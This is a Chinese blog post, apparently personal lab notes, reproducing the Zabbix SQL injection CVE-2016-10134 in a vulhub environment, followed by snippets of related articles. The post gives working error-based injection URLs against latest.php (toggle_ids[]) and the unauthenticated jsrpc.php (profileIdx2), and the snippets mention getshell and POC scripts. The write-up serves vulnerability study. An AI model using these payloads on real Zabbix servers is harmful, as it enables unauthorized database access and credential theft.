[自用]zabbix漏洞复现CVE-2016-10134

最新推荐文章于 2025-05-02 23:52:24 发布
最新推荐文章于 2025-05-02 23:52:24 发布
阅读量769 收藏 10
点赞数 16
CC 4.0 BY-SA版权
分类专栏: 中间件漏洞复现 文章标签: zabbix 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ex_island/article/details/142183898

zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。

vulhun搭建好环境之后直接访问

①根据靶场提示,登录guest账号,获得zbx_sessionid

将zbx_sessionid后16位作为sid,访问latest.php:http://your-ip:8080/latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)

成功注入,获得用户名

②通过jsrpc.php进行sql注入(无需登录):http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

③使用vulhub自带的payload进行注入(无需登录)

我这边就没有后续深入利用,看到很多大佬的博客都有进行后续的getshell,这边贴一个链接,方便自己后续查看:Zabbix sql注入漏洞复现(CVE-2016-10134) - FreeBuf网络安全行业门户

[ vulhub漏洞复现篇 ] zabbix SQL注入漏洞CVE-2016-10134
qq_51577576的博客
08-14 5214
👨‍🎓 博主介绍:大家好,我是,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!......
漏洞复现Zabbix SQL注入漏洞 - CVE-2024-42327
渗透之路,攻防之间皆学问
12-06 4203
Zabbix 前端上具有默认用户角色或具有提供 API 访问权限的任何其他角色的非管理员用户帐户可以利用此漏洞。SQLi 存在于 CUser 类的 addRelatedObjects 函数中,该函数是从 CUser.get 函数调用的,每个具有 API 访问权限的用户都可以使用该函数。
Zabbixcve-2016-10134漏洞复现
hh27644607523的博客
06-26 255
登录之后查看cookie中的zbx_sessionid并复制后16位。拉取镜像docker-compose up -d。也可以通过jsrpc.php触发,且无需登录。使用guest账号登录无需密码。将后16位作为值拼接访问。访问ip 8080端口。
Zabbix sql注入漏洞复现CVE-2016-10134
whojoe的博客
06-06 3965
Zabbix sql注入漏洞复现CVE-2016-10134)环境搭建 环境搭建 zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统 启动docker systemctl start docker 下载vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/zabbix/CVE-2016-10134/ 启
CVE-2024-42327:Zabbix认证后SQL注入漏洞
最新发布
LAY_BB的博客
05-02 795
漏洞存在于 user.get API 端点,任何拥有 API 访问权限的非管理员用户(包括默认的 “用户 ”角色)都可能利用该漏洞。通过操纵特定的 API 调用,攻击者可以注入恶意 SQL 代码,从而获得未经授权的访问权限和控制权。
zabbix latest.php SQL注入漏洞CVE-2016-10134复现,python编写POC
wangqiao258的博客
10-04 335
环境搭建: 使用vulhub,进入对应文件夹启动环境: [root@localhost CVE-2016-10134]# cd /home/vulhub/zabbix/CVE-2016-10134/ [root@localhost CVE-2016-10134]# docker-compose up -d 查看端口: [root@localhost CVE-2016-10134]# docker ps CONTAINER ID IMAGE COMMA
Zabbix sql注入漏洞(CVE-2016-10134)
m0_65150886的博客
12-27 1484
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle idsI或isrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshel操作。3.登录后,查看Cookie中的zbx_sessionid,复制后16位字符。6.利用jsrpc的profileIdx2参数sql注入获取用户名和密码。5.在攻击机访问的zabbix的地址后面加上如下url。
漏洞复现--Zabbix远程代码执行漏洞CVE-2020-11800含EXP)
HengMengSec的博客
08-21 2834
漏洞复现--Zabbix远程代码执行漏洞CVE-2020-11800含EXP)
ZABBIX 2.4.8漏洞复现
Nuyoah的博客
06-08 827
利用poc测试是否存在漏洞,放到kali下执行,首先修改poc.py里的端口,主机名。进入后台之后点击 组态–>动作–>自动注册–>创建动作。查看ZAXXIB,host 注册成功。添加主机成功,开启了自动注册功能。跳转到这个页面,选择添加主机。修改目录,直接读出flag。随便取一个名称,点击添加。
BUU一血![Zabbix]CVE-2016-10134
qq_43801002的博客
04-25 1067
zabbixzabbix([`zæbiks])是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。 zabbix由2部分构成,zabbix server与可选组件zabbix agent。 zabbix server可以通过SNMP,zabbi...
Zabbix漏洞
weixin_44237647的博客
11-20 1353
搜索方法:inurl:Zabbix/dashboard.php 漏洞说明: zabbix的某处存在报错注入,也可以使用sqlmap对报错点进行注入 报错点是profileIdx2= 发现用户名不是name字段,而是alias字段。与网上流传的exp的有所不同。 脚本参照前辈: 独自等待 https://www.waitalone.cn/ 更改为python3版本 import requests import os import sys import re def checkSql(): payloa
zabbix SQL注入漏洞CVE-2016-10134
SoulCat
01-26 7318
zabbix SQL注入漏洞CVE-2016-10134漏洞概述: zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle_ids[]或jsrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshell操作。 漏洞版本: 2.2.x 3....
zabbix latest.php SQL注入漏洞CVE-2016-10134
菜鸟耿耿
10-07 1649
zabbix latest.php SQL注入漏洞CVE-2016-10134zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。 一.环境搭建 zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,进入后台后script等功能直接获取zabbix服务器的操作系统权限。 攻击机IP:192.168.35.128 靶机IP: 192.168.35.1
Zabbix公告多个安全漏洞,涉及多个版本(附修复方案)
乐维社区的博客
01-18 2544
日前,Zabbix官方公告发现了2个安全漏洞,涉及多个版本,漏洞代号如下:高危漏洞CVE-2023-32725,一般漏洞CVE-2023-32727,据了解,高危漏洞CVE-2023-32725的CVSS评分高达9.6分。CVE-2023-32725漏洞出现在仪表板中,当用户使用带有 URL 小部件的仪表板的Scheduled reports时,将会造成zbx_session cookie 泄漏。
Zabbix Sia Zabbix任意文件读取/逻辑漏洞CVE-2022-23134)
qq_23003811的博客
07-24 818
Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix 存在安全漏洞,该漏洞源于在初始设置过程之后,setup.php 文件的某些步骤不仅可以由超级管理员访问,也可以由未经身份验证的用户访问。2、点击Administration-->scripts功能。1、登录后台,普通用户/密码Admin/zabbix。3、点击ping进行编辑,点击update进行更新。
警惕!Zabbix曝出严重漏洞,紧急修复指南速看
OpsEye的博客
12-04 825
漏洞编号漏洞类型:SQL注入漏洞漏洞位置:Zabbix前端的CUser类中的addRelatedObjects函数漏洞影响:未对输入数据进行充分验证和转义,导致具有API访问权限的恶意用户可以通过user.get API传递特制输入触发SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值